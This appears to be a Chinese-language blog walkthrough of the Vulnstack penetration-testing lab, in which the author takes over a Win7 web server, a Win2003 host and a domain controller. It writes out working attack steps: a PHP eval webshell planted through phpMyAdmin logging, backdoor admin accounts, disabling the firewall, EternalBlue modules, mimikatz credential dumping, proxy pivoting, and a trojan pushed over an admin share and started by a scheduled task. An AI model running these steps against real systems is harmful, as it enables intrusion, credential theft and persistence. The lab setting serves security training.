写在前面的话
第一次尝试这种渗透靶场,还是在考试的三天中完成的,会接着进行其他的靶场(真是又菜又爱玩)
靶场地址:vulunstack
靶场搭建
Win7:密码: cys121`
外网192.168.47.132
内网 192.168.52.143
Win2008 密码:cys121`
内网 192.168.52.138
Win2003 密码:cys121`
内网 192.168.52.141
经过互相ping 内网三台机器可以互相ping通
Kali
外网 192.168.47.129
Kali(攻击机):外网 192.168.47.129
Win7(VM1):外网192.168.47.132 内网 192.168.52.143
Win2003(VM2) 域成员 192.168.52.141
Win2008(VM3) 域控 192.168.52.138
启动win7 phpstudy:
信息搜集
访问win7 php网站服务:
看到是php探针
Nmap 扫描开启了哪些端口:开启80端口
御剑扫描:发现phpmyadmin
dirsearch 也扫到一些
这里我没有扫到/yxcms/
这里可以利用网页的漏洞登录进后台进行文件编辑写入一句话getshell,这里就不说了
漏洞利用getshell
后台Getshell
进入/phpmyadmin
默认账号密码登陆成功:root root
尝试一下用 into outfile执行写入一句话getshell失败:
select "<?php eval($_POST[shell]);?>" into out file '/tmp/cyshack.php'
原因是写入功能未开启
尝试开启全局日志利用getshell
show variables like '%general%';
可以看到功能是关闭的且回显日志文件的路径
尝试开启并更改路径
set global general_log='on'
set global general_log_file='C:/phpStudy/www/cyshack.php'
写入一句话:
select "<?php eval($_POST[shell]);?>"
蚁剑链接:
成功getshell:
蚁剑利用
蚁剑查询身份:
添加用户:
net user cys hongrisec@2020 /add
(增加一个名为cys 密码为hongrisec@2020的用户名)
查看cys用户:
关闭防火墙:
netsh advfirewall set allprofiles state off
控制win7
获取权限
有两种方法:
木马反弹shell
SMB ms17_010
Msvemon生成木马
蚁剑上传木马
运行木马:
在kali设置监听即可
尝试ms17_010:
攻击 拿下win7权限:
提升权限
Sysinfo
Getuid (发现是administor权限)
Getsystem (获取system权限)
主机密码收集
Hashdump:看到用户的密码哈希值
Mimikatz:抓取明文密码
ps:mimikatz模块已经合并为kiwi模块
Metasploit-进阶用户密码与mimikatz模块kiwi模块
load_kiwi:
creds_all 命令直接获取密码:
远程桌面连接
Nmap未开启3389
meterpreter尝试开启3389:
run post/windows/manage/enable_rdp
尝试远程登录:
rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u STU1 -p "密码" 192.168.47.132
内网搜集
ipconfig看到另外一个ip:
应该是内网网段
使用 ipconfig /all 查看 DNS 服务器:
发现 DNS 服务器名为 god.org
查看域信息:net view
查看主域信息:net view /domain
网上很多搜集手段,不在说了
添加路由,挂socks4a代理
横向渗透前,先将该web服务器配置为代理服务器当作跳板机。
添加路由
查看路由信息,添加路由到目标环境网络
目的是为了使得MSF能够通过Win7路由转发访问,使得msf命令能够通过win7 访问到 内网
Run get_local_subnets //可以用此命令查看目标机器所在内网网端信息与公网网端信息。
添加内网路由 使得msf6能通过win7路由转发访问内网192.168.52.0/24网段
run autoroute -s 192.168.52.0/24
这样,我们就可以通过msf 进入.52网段
马上扫描52网段:
run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24
扫描存活主机:
use auxiliary/scanner/netbios/nbname
内网端口信息:
use auxiliary/scanner/portscan/tcp
挂socks4a代理
挂代理是为了让其他工具能够通过win7 ,去访问192.168.52.0/24 网段
配置msf代理:
use auxiliary/server/socks_proxy
run之后会出现 starting... ,jobs可以查看当前代理任务,如果出现stoping...,可以尝试更改 SRVHOST配置 或者 修改如下配置文件
如果proxychains配置终端代理出现问题 修改一下文件
切记打开的是/etc/proxychains4.config
设置代理成功后 使用其他工具时需要添加proxychains:
Nmap扫描 192.168.52.141
proxychains nmap -Pn -sT 192.168.52.141 // -Pn -sT 不可少
渗透win2003(远程登录)
信息收集
扫描主机版本
use auxiliary/scanner/smb/smb_version
扫描192.168.52.141系统版本信息 是win2003
nmap 扫描端口等
尝试攻击
由nmap看到开放445端口
尝试永恒之蓝攻击win2003
use exploit/windows/smb/ms17_010_psexec //windows 2003 的攻击模块
set payload windows/meterpreter/bind_tcp
可以看到能获取权限但是win7直接断开连接
再次尝试:
依旧是:(经常性断掉win7 控制权,导致断一次我就要重新打一次)
我去!!!终于知道哪里错了
得到win7权限之后 一定要首先看一下自己的权限
Getuid
Getsystem
run post/windows/manage/enable_rdp(关闭防火墙)
再打一次:成了但是其他命令无法执行
尝试ms08-067没打下来
可以执行一些系统权限的命令,添加管理员用户尝试3389登录
use auxiliary/admin/smb/ms17_010_command
因为开了445端口:
use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user cyshack @cys121@ /add #添加用户
run #成功执行
set command net localgroup administrators cyshack /add #管理员权限
run #成功执行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' //开启3389端口
run #成功执行
系统权限命令:
cyshack用户:
3389:
然后使用proxychains连接他的3389(cyshack用户登录)
Proxychains rdesktop 192.168.52.141
走向win2008(C盘共享传马)
信息收集
扫描版本信息:
use auxiliary/scanner/smb/smb_version
Nmap:开启了135 和445 , 3389未开启
永恒之蓝和135端口漏洞都失败 放弃漏洞
使用命令:可添加用户
use auxiliary/admin/smb/ms17_010_command
另辟蹊径
win7中得到域内用户密码:
kiwi_cmd sekurlsa::logonpasswords
这里利用 win7 向域控传一个msf马,并让域控中的马定时开启然后我们只需要在kali设置监听即可
生成马:(设置反弹shell到win7的9999端口)
先win7连接域控的c盘共享
(shell) net use \\192.168.52.138\c$ "cys121`" /user:"administrator"
查看域控的c盘资源:
(shell) dir \\192.168.52.138\c$
说明成功
上传msf马到win7:
(win7 meterpreter) upload
将win7的马共享给域控:
(shell) copy c:\Windows\System32\cyshoumen.exe \\192.168.52.138\c$
看到域控:
设置一个任务计划,定时启动木马:
schtasks /create /tn "test" /tr C:\cyshoumen.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "cys121`"
设置监听:此时应该监听win7的9999端口
到时间点之后会反弹shell:
拿下